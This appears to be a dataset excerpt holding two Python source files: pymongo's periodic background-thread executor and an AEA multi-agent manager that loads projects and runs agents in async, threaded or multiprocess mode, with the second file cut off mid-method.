source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
periodic_executor.py
|
# Copyright 2014-2015 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you
# may not use this file except in compliance with the License. You
# may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
"""Run a target function on a background thread."""
import atexit
import threading
import time
import weakref
from pymongo.monotonic import time as _time
class PeriodicExecutor(object):
def __init__(self, interval, min_interval, target, name=None):
""""Run a target function periodically on a background thread.
If the target's return value is false, the executor stops.
:Parameters:
- `interval`: Seconds between calls to `target`.
- `min_interval`: Minimum seconds between calls if `wake` is
called very often.
- `target`: A function.
- `name`: A name to give the underlying thread.
"""
# threading.Event and its internal condition variable are expensive
# in Python 2, see PYTHON-983. Use a boolean to know when to wake.
# The executor's design is constrained by several Python issues, see
# "periodic_executor.rst" in this repository.
self._event = False
self._interval = interval
self._min_interval = min_interval
self._target = target
self._stopped = False
self._thread = None
self._name = name
def open(self):
"""Start. Multiple calls have no effect.
Not safe to call from multiple threads at once.
"""
self._stopped = False
started = False
try:
started = self._thread and self._thread.is_alive()
except ReferenceError:
# Thread terminated.
pass
if not started:
thread = threading.Thread(target=self._run, name=self._name)
thread.daemon = True
self._thread = weakref.proxy(thread)
_register_executor(self)
thread.start()
def close(self, dummy=None):
"""Stop. To restart, call open().
The dummy parameter allows an executor's close method to be a weakref
callback; see monitor.py.
"""
self._stopped = True
def join(self, timeout=None):
if self._thread is not None:
try:
self._thread.join(timeout)
except (ReferenceError, RuntimeError):
# Thread already terminated, or not yet started.
pass
def wake(self):
"""Execute the target function soon."""
self._event = True
def _run(self):
while not self._stopped:
try:
if not self._target():
self._stopped = True
break
except:
self._stopped = True
raise
deadline = _time() + self._interval
while not self._stopped and _time() < deadline:
time.sleep(self._min_interval)
if self._event:
break # Early wake.
self._event = False
# _EXECUTORS has a weakref to each running PeriodicExecutor. Once started,
# an executor is kept alive by a strong reference from its thread and perhaps
# from other objects. When the thread dies and all other referrers are freed,
# the executor is freed and removed from _EXECUTORS. If any threads are
# running when the interpreter begins to shut down, we try to halt and join
# them to avoid spurious errors.
_EXECUTORS = set()
def _register_executor(executor):
ref = weakref.ref(executor, _on_executor_deleted)
_EXECUTORS.add(ref)
def _on_executor_deleted(ref):
_EXECUTORS.remove(ref)
def _shutdown_executors():
if _EXECUTORS is None:
return
# Copy the set. Stopping threads has the side effect of removing executors.
executors = list(_EXECUTORS)
# First signal all executors to close...
for ref in executors:
executor = ref()
if executor:
executor.close()
# ...then try to join them.
for ref in executors:
executor = ref()
if executor:
executor.join(1)
executor = None
atexit.register(_shutdown_executors)
|
manager.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2022 Valory AG
# Copyright 2018-2021 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the implementation of AEA agents manager."""
import asyncio
import datetime
import json
import multiprocessing
import os
import threading
from abc import ABC, abstractmethod
from asyncio.tasks import FIRST_COMPLETED
from collections import defaultdict
from multiprocessing.synchronize import Event
from shutil import rmtree
from threading import Thread
from traceback import format_exc
from typing import Any, Callable, Dict, List, Optional, Set, Tuple
from aea.aea import AEA
from aea.configurations.base import AgentConfig
from aea.configurations.constants import AEA_MANAGER_DATA_DIRNAME, DEFAULT_REGISTRY_NAME
from aea.configurations.data_types import PackageIdPrefix, PublicId
from aea.exceptions import enforce
from aea.helpers.io import open_file
from aea.manager.project import AgentAlias, Project
from aea.manager.utils import (
get_venv_dir_for_project,
project_check,
project_install_and_build,
run_in_venv,
)
class ProjectNotFoundError(ValueError):
"""Project not found exception."""
class ProjectCheckError(ValueError):
"""Project check error exception."""
def __init__(self, msg: str, source_exception: Exception):
"""Init exception."""
super().__init__(msg)
self.source_exception = source_exception
class ProjectPackageConsistencyCheckError(ValueError):
"""Check consistency of package versions against already added project."""
def __init__(
self,
agent_project_id: PublicId,
conflicting_packages: List[Tuple[PackageIdPrefix, str, str, Set[PublicId]]],
):
"""
Initialize the exception.
:param agent_project_id: the agent project id whose addition has failed.
:param conflicting_packages: the conflicting packages.
"""
self.agent_project_id = agent_project_id
self.conflicting_packages = conflicting_packages
super().__init__(self._build_error_message())
def _build_error_message(self) -> str:
"""Build the error message."""
conflicting_packages = sorted(self.conflicting_packages, key=str)
message = f"cannot add project '{self.agent_project_id}': the following AEA dependencies have conflicts with previously added projects:\n"
for (
(type_, author, name),
existing_version,
new_version,
agents,
) in conflicting_packages:
message += f"- '{author}/{name}' of type {type_}: the new version '{new_version}' conflicts with existing version '{existing_version}' of the same package required by agents: {list(agents)}\n"
return message
class BaseAgentRunTask(ABC):
"""Base abstract class for agent run tasks."""
@abstractmethod
def start(self) -> None:
"""Start task."""
@abstractmethod
def wait(self) -> asyncio.Future:
"""Return future to wait task completed."""
@abstractmethod
def stop(self) -> None:
"""Stop task."""
@property
@abstractmethod
def is_running(self) -> bool:
"""Return is task running."""
class AgentRunAsyncTask(BaseAgentRunTask):
"""Async task wrapper for agent."""
def __init__(self, agent: AEA, loop: asyncio.AbstractEventLoop) -> None:
"""Init task with agent alias and loop."""
self.agent = agent
self.run_loop: asyncio.AbstractEventLoop = loop
self.caller_loop: asyncio.AbstractEventLoop = loop
self._done_future: Optional[asyncio.Future] = None
self.task: Optional[asyncio.Task] = None
def create_run_loop(self) -> None:
"""Create run loop."""
def start(self) -> None:
"""Start task."""
self.create_run_loop()
self._done_future = asyncio.Future()
self.task = self.run_loop.create_task(self._run_wrapper())
def wait(self) -> asyncio.Future:
"""Return future to wait task completed."""
if not self._done_future: # pragma: nocover
raise ValueError("Task not started!")
return self._done_future
def stop(self) -> None:
"""Stop task."""
if not self.run_loop or not self.task: # pragma: nocover
raise ValueError("Task was not started!")
self.run_loop.call_soon_threadsafe(self.task.cancel)
async def _run_wrapper(self) -> None:
"""Run task internals."""
if not self._done_future: # pragma: nocover
raise ValueError("Task was not started! please use start method")
exc = None
try:
await self.run()
except asyncio.CancelledError: # pragma: nocover
pass
except Exception as e: # pylint: disable=broad-except
exc = e
finally:
self.caller_loop.call_soon_threadsafe(self._set_result, exc)
def _set_result(self, exc: Optional[BaseException]) -> None:
"""Set result of task execution."""
if not self._done_future or self._done_future.done(): # pragma: nocover
return
if exc:
self._done_future.set_exception(exc)
else:
self._done_future.set_result(None)
async def run(self) -> None:
"""Run task body."""
self.agent.runtime.set_loop(self.run_loop)
await self.agent.runtime.run()
@property
def is_running(self) -> bool:
"""Return is task running."""
return not self.wait().done()
class AgentRunThreadTask(AgentRunAsyncTask):
"""Threaded wrapper to run agent."""
def __init__(self, agent: AEA, loop: asyncio.AbstractEventLoop) -> None:
"""Init task with agent alias and loop."""
AgentRunAsyncTask.__init__(self, agent, loop)
self._thread: Optional[Thread] = None
def create_run_loop(self) -> None:
"""Create run loop."""
self.run_loop = asyncio.new_event_loop()
def start(self) -> None:
"""Run task in a dedicated thread."""
super().start()
self._thread = threading.Thread(
target=self.run_loop.run_until_complete, args=[self.task], daemon=True
)
self._thread.start()
def stop(
self,
) -> None:
"""Stop the task."""
super().stop()
if self._thread is not None:
self._thread.join()
class AgentRunProcessTask(BaseAgentRunTask):
"""Subprocess wrapper to run agent."""
PROCESS_JOIN_TIMEOUT = 20 # in seconds
PROCESS_ALIVE_SLEEP_TIME = 0.005 # in seconds
def __init__( # pylint: disable=super-init-not-called
self, agent_alias: AgentAlias, loop: asyncio.AbstractEventLoop
) -> None:
"""Init task with agent alias and loop."""
self.caller_loop: asyncio.AbstractEventLoop = loop
self._manager = multiprocessing.Manager()
self._stop_event = self._manager.Event()
self.agent_alias = agent_alias
self.process: Optional[multiprocessing.Process] = None
self._wait_task: Optional[asyncio.Future] = None
self._result_queue = self._manager.Queue()
def start(self) -> None:
"""Run task in a dedicated process."""
self._wait_task = asyncio.ensure_future(
self._wait_for_result(), loop=self.caller_loop
)
self.process = multiprocessing.Process(
target=self._run_agent,
args=(self.agent_alias, self._stop_event, self._result_queue),
)
self.process.start()
async def _wait_for_result(self) -> Any:
"""Wait for the result of the function call."""
if not self.process:
raise ValueError("Task not started!") # pragma: nocover
while self.process.is_alive():
await asyncio.sleep(self.PROCESS_ALIVE_SLEEP_TIME)
result = self._result_queue.get_nowait()
self.process.join(self.PROCESS_JOIN_TIMEOUT)
if isinstance(result, Exception):
raise result
return result
def wait(self) -> asyncio.Future:
"""Return future to wait task completed."""
if not self._wait_task:
raise ValueError("Task not started") # pragma: nocover
return self._wait_task
@staticmethod
def _run_agent(
agent_alias: AgentAlias,
stop_event: Event,
result_queue: multiprocessing.Queue,
) -> None:
"""Start an agent in a child process."""
t: Optional[Thread] = None
r: Optional[Exception] = None
run_stop_thread: bool = True
# set a new event loop, cause it's a new process
asyncio.set_event_loop(asyncio.new_event_loop())
try:
aea = agent_alias.get_aea_instance()
def stop_event_thread() -> None:
try:
while run_stop_thread:
if stop_event.wait(0.01) is True:
break
finally:
aea.runtime.stop()
t = Thread(target=stop_event_thread, daemon=True)
t.start()
loop = asyncio.get_event_loop()
aea.runtime.set_loop(loop)
aea.runtime.start()
loop.run_until_complete(aea.runtime.wait_completed())
except BaseException as e: # pylint: disable=broad-except
print(
f"Exception in agent subprocess task at {datetime.datetime.now()}:\n{format_exc()}"
)
r = Exception(str(e), repr(e))
finally:
run_stop_thread = False
if t:
t.join(10)
result_queue.put(r)
aea.logger.debug("process task stopped")
def stop(self) -> None:
"""Stop the task."""
if not self.process:
raise ValueError("Task not started!") # pragma: nocover
self._stop_event.set()
self.process.join(self.PROCESS_JOIN_TIMEOUT)
if self.is_running: # pragma: nocover
self.process.terminate()
self.process.join(5)
raise ValueError(
f"process was not stopped within timeout: {self.PROCESS_JOIN_TIMEOUT} and was terminated"
)
@property
def is_running(self) -> bool:
"""Is agent running."""
if not self.process:
raise ValueError("Task not started!") # pragma: nocover
return self.process.is_alive()
ASYNC_MODE = "async"
THREADED_MODE = "threaded"
MULTIPROCESS_MODE = "multiprocess"
class MultiAgentManager:
"""Multi agents manager."""
MODES = [ASYNC_MODE, THREADED_MODE, MULTIPROCESS_MODE]
_MODE_TASK_CLASS = {
ASYNC_MODE: AgentRunAsyncTask,
THREADED_MODE: AgentRunThreadTask,
MULTIPROCESS_MODE: AgentRunProcessTask,
}
DEFAULT_TIMEOUT_FOR_BLOCKING_OPERATIONS = 60
VENV_BUILD_TIMEOUT = 240
SAVE_FILENAME = "save.json"
def __init__(
self,
working_dir: str,
mode: str = "async",
registry_path: str = DEFAULT_REGISTRY_NAME,
auto_add_remove_project: bool = False,
password: Optional[str] = None,
) -> None:
"""
Initialize manager.
:param working_dir: directory to store base agents.
:param mode: str. async or threaded
:param registry_path: str. path to the local packages registry
:param auto_add_remove_project: bool. add/remove project on the first agent add/last agent remove
:param password: the password to encrypt/decrypt the private key.
"""
self.working_dir = working_dir
self._auto_add_remove_project = auto_add_remove_project
self._save_path = os.path.join(self.working_dir, self.SAVE_FILENAME)
self.registry_path = registry_path
self._was_working_dir_created = False
self._is_running = False
self._projects: Dict[PublicId, Project] = {}
self._versionless_projects_set: Set[PublicId] = set()
self._data_dir = os.path.abspath(
os.path.join(self.working_dir, AEA_MANAGER_DATA_DIRNAME)
)
self._agents: Dict[str, AgentAlias] = {}
self._agents_tasks: Dict[str, BaseAgentRunTask] = {}
self._thread: Optional[Thread] = None
self._loop: Optional[asyncio.AbstractEventLoop] = None
self._event: Optional[asyncio.Event] = None
self._error_callbacks: List[Callable[[str, BaseException], None]] = [
self._default_error_callback
]
self._custom_callback_added: bool = False
self._last_start_status: Optional[
Tuple[
bool,
Dict[PublicId, List[Dict]],
List[Tuple[PublicId, List[Dict], Exception]],
]
] = None
if mode not in self.MODES:
raise ValueError(
f'Invalid mode {mode}. Valid modes are {", ".join(self.MODES)}'
)
self._started_event = threading.Event()
self._mode = mode
self._password = password
# this flags will control whether we have already printed the warning message
# for a certain agent
self._warning_message_printed_for_agent: Dict[str, bool] = {}
# the dictionary keeps track of the AEA packages used across
# AEA projects in the same MAM.
# It maps package prefixes to a pair: (version, agent_ids)
# where agent_ids is the set of agent ids whose projects
# have the package in the key at the specific version.
self._package_id_prefix_to_version: Dict[
PackageIdPrefix, Tuple[str, Set[PublicId]]
] = {}
@property
def data_dir(self) -> str:
"""Get the certs directory."""
return self._data_dir
def get_data_dir_of_agent(self, agent_name: str) -> str:
"""Get the data directory of a specific agent."""
return os.path.join(self.data_dir, agent_name)
@property
def is_running(self) -> bool:
"""Is manager running."""
return self._is_running
@property
def dict_state(self) -> Dict[str, Any]:
"""Create MultiAgentManager dist state."""
return {
"projects": [str(public_id) for public_id in self._projects.keys()],
"agents": [alias.dict for alias in self._agents.values()],
}
@property
def projects(self) -> Dict[PublicId, Project]:
"""Get all projects."""
return self._projects
def _run_thread(self) -> None:
"""Run internal thread with own event loop."""
self._loop = asyncio.new_event_loop()
self._loop.run_until_complete(self._manager_loop())
async def _manager_loop(self) -> None:
"""Await and control running manager."""
self._event = asyncio.Event()
self._started_event.set()
while self._is_running:
agents_run_tasks_futures = {
task.wait(): agent_name
for agent_name, task in self._agents_tasks.items()
}
wait_tasks = [
asyncio.ensure_future(i)
for i in [*agents_run_tasks_futures.keys(), self._event.wait()]
]
done, _ = await asyncio.wait(wait_tasks, return_when=FIRST_COMPLETED)
if self._event.is_set():
self._event.clear()
for task in done:
if task not in agents_run_tasks_futures:
# task not in agents_run_tasks_futures, so it's event_wait, skip it
await task
continue
agent_name = agents_run_tasks_futures[task]
self._agents_tasks.pop(agent_name)
if task.exception():
for callback in self._error_callbacks:
callback(agent_name, task.exception()) # type: ignore
else:
await task
def add_error_callback(
self, error_callback: Callable[[str, BaseException], None]
) -> "MultiAgentManager":
"""Add error callback to call on error raised."""
if len(self._error_callbacks) == 1 and not self._custom_callback_added:
# only default callback present, reset before adding new callback
self._custom_callback_added = True
self._error_callbacks = []
self._error_callbacks.append(error_callback)
return self
def start_manager(
self, local: bool = False, remote: bool = False
) -> "MultiAgentManager":
"""
Start manager.
If local = False and remote = False, then the packages
are fetched in mixed mode (i.e. first try from local
registry, and then from remote registry in case of failure).
:param local: whether or not to fetch from local registry.
:param remote: whether or not to fetch from remote registry.
:return: the MultiAgentManager instance.
"""
if self._is_running:
return self
self._ensure_working_dir()
self._last_start_status = self._load_state(local=local, remote=remote)
self._started_event.clear()
self._is_running = True
self._thread = Thread(target=self._run_thread, daemon=True)
self._thread.start()
self._started_event.wait(self.DEFAULT_TIMEOUT_FOR_BLOCKING_OPERATIONS)
return self
@property
def last_start_status(
self,
) -> Tuple[
bool,
Dict[PublicId, List[Dict]],
List[Tuple[PublicId, List[Dict], Exception]],
]:
"""Get status of the last agents start loading state."""
if self._last_start_status is None:
raise ValueError("Manager was not started")
return self._last_start_status
def stop_manager(
self, cleanup: bool = True, save: bool = False
) -> "MultiAgentManager":
"""
Stop manager.
Stops all running agents and stop agent.
:param cleanup: bool is cleanup on stop.
:param save: bool is save state to file on stop.
:return: None
"""
if not self._is_running:
return self
if not self._loop or not self._event or not self._thread: # pragma: nocover
raise ValueError("Manager was not started!")
if not self._thread.is_alive(): # pragma: nocover
return self
self.stop_all_agents()
if save:
self._save_state()
for agent_name in self.list_agents():
self.remove_agent(agent_name, skip_project_auto_remove=True)
if cleanup:
for project in list(self._projects.keys()):
self.remove_project(project, keep_files=save)
self._cleanup(only_data=save)
self._is_running = False
self._loop.call_soon_threadsafe(self._event.set)
if self._thread.ident != threading.get_ident():
self._thread.join(self.DEFAULT_TIMEOUT_FOR_BLOCKING_OPERATIONS)
self._thread = None
self._warning_message_printed_for_agent = {}
return self
def _cleanup(self, only_data: bool = False) -> None:
"""Remove workdir if was created."""
if only_data:
rmtree(self.data_dir)
else:
if self._was_working_dir_created and os.path.exists(self.working_dir):
rmtree(self.working_dir)
def add_project(
self,
public_id: PublicId,
local: bool = False,
remote: bool = False,
restore: bool = False,
) -> "MultiAgentManager":
"""
Fetch agent project and all dependencies to working_dir.
If local = False and remote = False, then the packages
are fetched in mixed mode (i.e. first try from local
registry, and then from remote registry in case of failure).
:param public_id: the public if of the agent project.
:param local: whether or not to fetch from local registry.
:param remote: whether or not to fetch from remote registry.
:param restore: bool flag for restoring already fetched agent.
:return: self
"""
if public_id.to_any() in self._versionless_projects_set:
raise ValueError(
f"The project ({public_id.author}/{public_id.name}) was already added!"
)
project = Project.load(
self.working_dir,
public_id,
local,
remote,
registry_path=self.registry_path,
is_restore=restore,
skip_aea_validation=False,
)
if not restore:
self._project_install_and_build(project)
self._check_version_consistency(project.agent_config)
try:
self._check_project(project)
except Exception as e:
project.remove()
raise ProjectCheckError(
f"Failed to load project: {public_id} Error: {str(e)}", e
)
self._add_new_package_versions(project.agent_config)
self._versionless_projects_set.add(public_id.to_any())
self._projects[public_id] = project
return self
def _project_install_and_build(self, project: Project) -> None:
"""Build and install project dependencies."""
if self._mode == MULTIPROCESS_MODE:
venv_dir = get_venv_dir_for_project(project)
run_in_venv(
venv_dir, project_install_and_build, self.VENV_BUILD_TIMEOUT, project
)
else:
venv_dir = get_venv_dir_for_project(project)
project_install_and_build(project)
def _check_project(self, project: Project) -> None:
if self._mode == MULTIPROCESS_MODE:
venv_dir = get_venv_dir_for_project(project)
run_in_venv(venv_dir, project_check, 120, project)
else:
project_check(project)
def remove_project(
self, public_id: PublicId, keep_files: bool = False
) -> "MultiAgentManager":
"""Remove agent project."""
if public_id not in self._projects:
raise ValueError(f"Project {public_id} is not present!")
if self._projects[public_id].agents:
raise ValueError(
f"Can not remove projects with aliases exists: {self._projects[public_id].agents}"
)
project = self._projects.pop(public_id)
self._remove_package_versions(project.agent_config)
self._versionless_projects_set.remove(public_id.to_any())
if not keep_files:
project.remove()
return self
def list_projects(self) -> List[PublicId]:
"""
List all agents projects added.
:return: list of public ids of projects
"""
return list(self._projects.keys())
def add_agent(
self,
public_id: PublicId,
agent_name: Optional[str] = None,
agent_overrides: Optional[dict] = None,
component_overrides: Optional[List[dict]] = None,
local: bool = False,
remote: bool = False,
restore: bool = False,
) -> "MultiAgentManager":
"""
Create new agent configuration based on project with config overrides applied.
Alias is stored in memory only!
:param public_id: base agent project public id
:param agent_name: unique name for the agent
:param agent_overrides: overrides for agent config.
:param component_overrides: overrides for component section.
:param local: whether or not to fetch from local registry.
:param remote: whether or not to fetch from remote registry.
:param restore: bool flag for restoring already fetched agent.
:return: self
"""
agent_name = agent_name or public_id.name
if agent_name in self._agents:
raise ValueError(f"Agent with name {agent_name} already exists!")
project = self._projects.get(public_id, None)
if project is None and self._auto_add_remove_project:
self.add_project(public_id, local, remote, restore)
project = self._projects.get(public_id, None)
if project is None:
raise ProjectNotFoundError(f"{public_id} project is not added!")
agent_alias = AgentAlias(
project=project,
agent_name=agent_name,
data_dir=self.get_data_dir_of_agent(agent_name),
password=self._password,
)
agent_alias.set_overrides(agent_overrides, component_overrides)
project.agents.add(agent_name)
self._agents[agent_name] = agent_alias
return self
def add_agent_with_config(
self,
public_id: PublicId,
config: List[dict],
agent_name: Optional[str] = None,
) -> "MultiAgentManager":
"""
Create new agent configuration based on project with config provided.
Alias is stored in memory only!
:param public_id: base agent project public id
:param agent_name: unique name for the agent
:param config: agent config (used for agent re-creation).
:return: manager
"""
agent_name = agent_name or public_id.name
if agent_name in self._agents: # pragma: nocover
raise ValueError(f"Agent with name {agent_name} already exists!")
if public_id not in self._projects: # pragma: nocover
raise ValueError(f"{public_id} project is not added!")
project = self._projects[public_id]
agent_alias = AgentAlias(
project=project,
agent_name=agent_name,
data_dir=self.get_data_dir_of_agent(agent_name),
password=self._password,
)
agent_alias.set_agent_config_from_data(config)
project.agents.add(agent_name)
self._agents[agent_name] = agent_alias
return self
def get_agent_overridables(self, agent_name: str) -> Tuple[Dict, List[Dict]]:
"""
Get agent config overridables.
:param agent_name: str
:return: Tuple of agent overridables dict and and list of component overridables dict.
"""
if agent_name not in self._agents: # pragma: nocover
raise ValueError(f"Agent with name {agent_name} does not exist!")
return self._agents[agent_name].get_overridables()
def set_agent_overrides(
self,
agent_name: str,
agent_overides: Optional[Dict],
components_overrides: Optional[List[Dict]],
) -> "MultiAgentManager":
"""
Set agent overrides.
:param agent_name: str
:param agent_overides: optional dict of agent config overrides
:param components_overrides: optional list of dict of components overrides
:return: self
"""
if agent_name not in self._agents: # pragma: nocover
raise ValueError(f"Agent with name {agent_name} does not exist!")
if self._is_agent_running(agent_name): # pragma: nocover
raise ValueError("Agent is running. stop it first!")
self._agents[agent_name].set_overrides(agent_overides, components_overrides)
return self
def list_agents_info(self) -> List[Dict[str, Any]]:
"""
List agents detailed info.
:return: list of dicts that represents agent info: public_id, name, is_running.
"""
return [
{
"agent_name": agent_name,
"public_id": str(alias.project.public_id),
"addresses": alias.get_addresses(),
"is_running": self._is_agent_running(agent_name),
}
for agent_name, alias in self._agents.items()
]
def list_agents(self, running_only: bool = False) -> List[str]:
"""
List all agents.
:param running_only: returns only running if set to True
:return: list of agents names
"""
if running_only:
return [i for i in self._agents.keys() if self._is_agent_running(i)]
return list(self._agents.keys())
def remove_agent(
self, agent_name: str, skip_project_auto_remove: bool = False
) -> "MultiAgentManager":
"""
Remove agent alias definition from registry.
:param agent_name: agent name to remove
:param skip_project_auto_remove: disable auto project remove on last agent removed.
:return: None
"""
if agent_name not in self._agents:
raise ValueError(f"Agent with name {agent_name} does not exist!")
if self._is_agent_running(agent_name):
raise ValueError("Agent is running. stop it first!")
agent_alias = self._agents.pop(agent_name)
agent_alias.remove_from_project()
project: Project = agent_alias.project
if (
not project.agents
and self._auto_add_remove_project
and not skip_project_auto_remove
):
self.remove_project(project.public_id, keep_files=False)
return self
def start_agent(self, agent_name: str) -> "MultiAgentManager":
"""
Start selected agent.
:param agent_name: agent name to start
:return: None
"""
if not self._loop or not self._event: # pragma: nocover
raise ValueError("agent is not started!")
agent_alias = self._agents.get(agent_name)
if not agent_alias:
raise ValueError(f"{agent_name} is not registered!")
if self._is_agent_running(agent_name):
raise ValueError(f"{agent_name} is already started!")
event = threading.Event()
self._loop.call_soon_threadsafe(
self._make_agent_task, agent_name, agent_alias, event
)
event.wait(30) # if something goes wrong
del event
self._loop.call_soon_threadsafe(self._event.set)
return self
def _make_agent_task(
self, agent_name: str, agent_alias: AgentAlias, event: threading.Event
) -> None:
"""Create and start agent task."""
task_cls = self._MODE_TASK_CLASS[self._mode]
if self._mode == MULTIPROCESS_MODE:
task = task_cls(agent_alias, self._loop)
else:
agent = agent_alias.get_aea_instance()
task = task_cls(agent, self._loop)
self._agents_tasks[agent_name] = task
task.start()
event.set()
def _is_agent_running(self, agent_name: str) -> bool:
"""Return is agent task in running state."""
if agent_name not in self._agents_tasks:
return False
task = self._agents_tasks[agent_name]
return task.is_running
def start_all_agents(self) -> "MultiAgentManager":
"""
Start all not started agents.
:return: None
"""
self.start_agents(
[
agent_name
for agent_name in self.list_agents()
if not self._is_agent_running(agent_name)
]
)
return self
def stop_agent(self, agent_name: str) -> "MultiAgentManager":
"""
Stop running agent.
:param agent_name: agent name to stop
:return: self
"""
if not self._is_agent_running(agent_name) or not self._thread or not self._loop:
raise ValueError(f"{agent_name} is not running!")
agent_task = self._agents_tasks[agent_name]
if self._thread.ident == threading.get_ident(): # pragma: nocover
# In same thread do not perform blocking operations!
agent_task.stop()
return self
wait_future = agent_task.wait()
event = threading.Event()
def event_set(*args: Any) -> None: # pylint: disable=unused-argument
event.set()
def _add_cb() -> None:
if wait_future.done():
event_set() # pragma: nocover
else:
wait_future.add_done_callback(event_set) # pragma: nocover
self._loop.call_soon_threadsafe(_add_cb)
agent_task.stop()
event.wait(self.DEFAULT_TIMEOUT_FOR_BLOCKING_OPERATIONS)
if agent_task.is_running: # pragma: nocover
raise ValueError(f"cannot stop task of agent {agent_name}")
return self
def stop_all_agents(self) -> "MultiAgentManager":
"""
Stop all agents running.
:return: self
"""
agents_list = self.list_agents(running_only=True)
self.stop_agents(agents_list)
return self
def stop_agents(self, agent_names: List[str]) -> "MultiAgentManager":
"""
Stop specified agents.
:param agent_names: names of agents
:return: self
"""
for agent_name in agent_names:
if not self._is_agent_running(agent_name):
raise ValueError(f"{agent_name} is not running!")
for agent_name in agent_names:
self.stop_agent(agent_name)
return self
def start_agents(self, agent_names: List[str]) -> "MultiAgentManager":
"""
Stop specified agents.
:param agent_names: names of agents
:return: self
"""
for agent_name in agent_names:
self.start_agent(agent_name)
return self
def get_agent_alias(self, agent_name: str) -> AgentAlias:
"""
Return details about agent alias definition.
:param agent_name: name of agent
:return: AgentAlias
"""
if agent_name not in self._agents: # pragma: nocover
raise ValueError(f"Agent with name {agent_name} does not exist!")
return self._agents[agent_name]
def _ensure_working_dir(self) -> None:
"""Create working dir if needed."""
if not os.path.exists(self.working_dir):
os.makedirs(self.working_dir)
self._was_working_dir_created = True
if not os.path.isdir(self.working_dir): # pragma: nocover
raise ValueError(f"{self.working_dir} is not a directory!")
if not os.path.exists(self.data_dir):
os.makedirs(self.data_dir)
def _load_state(
self, local: bool, remote: bool
) -> Tuple[
bool,
Dict[PublicId, List[Dict]],
List[Tuple[PublicId, List[Dict], Exception]],
]:
"""
Load saved state from file.
Fetch agent project and all dependencies to working_dir.
If local = False and remote = False, then the packages
are fetched in mixed mode (i.e. first try from local
registry, and then from remote registry in case of failure).
:param local: whether or not to fetch from local registry.
:param remote: whether or not to fetch from remote registry.
:return: Tuple of bool indicating load success, settings of loaded, list of failed
:raises: ValueError if failed to load state.
"""
if not os.path.exists(self._save_path):
return False, {}, []
save_json = {}
with open_file(self._save_path) as f:
save_json = json.load(f)
if not save_json:
return False, {}, [] # pragma: nocover
projects_agents: Dict[PublicId, List] = defaultdict(list)
for agent_settings in save_json["agents"]:
projects_agents[PublicId.from_str(agent_settings["public_id"])].append(
agent_settings
)
failed_to_load: List[Tuple[PublicId, List[Dict], Exception]] = []
loaded_ok: Dict[PublicId, List[Dict]] = {}
for project_public_id, agents_settings in projects_agents.items():
try:
self.add_project(
project_public_id,
local=local,
remote=remote,
restore=True,
)
except ProjectCheckError as e:
failed_to_load.append((project_public_id, agents_settings, e))
break
for agent_settings in agents_settings:
self.add_agent_with_config(
public_id=PublicId.from_str(agent_settings["public_id"]),
agent_name=agent_settings["agent_name"],
config=agent_settings["config"],
)
loaded_ok[project_public_id] = agents_settings
return True, loaded_ok, failed_to_load
def _save_state(self) -> None:
"""Save MultiAgentManager state."""
with open_file(self._save_path, "w") as f:
json.dump(self.dict_state, f, indent=4, sort_keys=True)
def _default_error_callback(
self, agent_name: str, exception: BaseException
) -> None:
"""
Handle errors from running agents.
This is the default error callback. To replace it
with another one, use the method 'add_error_callback'.
:param agent_name: the agent name
:param exception: the caught exception
"""
self._print_exception_occurred_but_no_error_callback(agent_name, exception)
def _print_exception_occurred_but_no_error_callback(
self, agent_name: str, exception: BaseException
) -> None:
"""
Print a warning message when an exception occurred but no error callback is registered.
:param agent_name: the agent name.
:param exception: the caught exception.
"""
if self._warning_message_printed_for_agent.get(agent_name, False):
return # pragma: nocover
self._warning_message_printed_for_agent[agent_name] = True
print(
f"WARNING: An exception occurred during the execution of agent '{agent_name}':\n",
str(exception),
repr(exception),
"\nHowever, since no error callback was found the exception is handled silently. Please "
"add an error callback using the method 'add_error_callback' of the MultiAgentManager instance.",
)
def _check_version_consistency(self, agent_config: AgentConfig) -> None:
"""
Check that the agent dependencies in input are consistent with the other projects.
:param agent_config: the agent configuration we are going to add.
:return: None
:raises ProjectPackageConsistencyCheckError: if a version conflict is detected.
"""
existing_packages = set(self._package_id_prefix_to_version.keys())
prefix_to_version = {
component_id.component_prefix: component_id.version
for component_id in agent_config.package_dependencies
}
component_prefixes_to_be_added = set(prefix_to_version.keys())
potentially_conflicting_packages = existing_packages.intersection(
component_prefixes_to_be_added
)
if len(potentially_conflicting_packages) == 0:
return
# conflicting_packages is a list of tuples whose elements are:
# - package id prefix: the triple (component type, author, name)
# - current_version: the version currently present in the MAM, across all projects
# - new_version: the version of the package in the new project
# - agents: the set of agents in the MAM that have the package;
# used to provide a better error message
conflicting_packages: List[Tuple[PackageIdPrefix, str, str, Set[PublicId]]] = []
for package_prefix in potentially_conflicting_packages:
existing_version, agents = self._package_id_prefix_to_version[
package_prefix
]
new_version = prefix_to_version[package_prefix]
if existing_version != new_version:
conflicting_packages.append(
(package_prefix, existing_version, new_version, agents)
)
if len(conflicting_packages) == 0:
return
raise ProjectPackageConsistencyCheckError(
agent_config.public_id, conflicting_packages
)
def _add_new_package_versions(self, agent_config: AgentConfig) -> None:
"""
Add new package versions.
This method is called whenever a project agent is added.
It updates an internal data structure that it is used to
check inconsistencies of AEA package versions across projects.
In particular, all the AEA packages with the same "prefix" must
be of the same version.
:param agent_config: the agent configuration.
"""
for component_id in agent_config.package_dependencies:
if component_id.component_prefix not in self._package_id_prefix_to_version:
self._package_id_prefix_to_version[component_id.component_prefix] = (
component_id.version,
set(),
)
version, agents = self._package_id_prefix_to_version[
component_id.component_prefix
]
enforce(
version == component_id.version,
f"internal consistency error: expected version '{version}', found {component_id.version}",
)
agents.add(agent_config.public_id)
def _remove_package_versions(self, agent_config: AgentConfig) -> None:
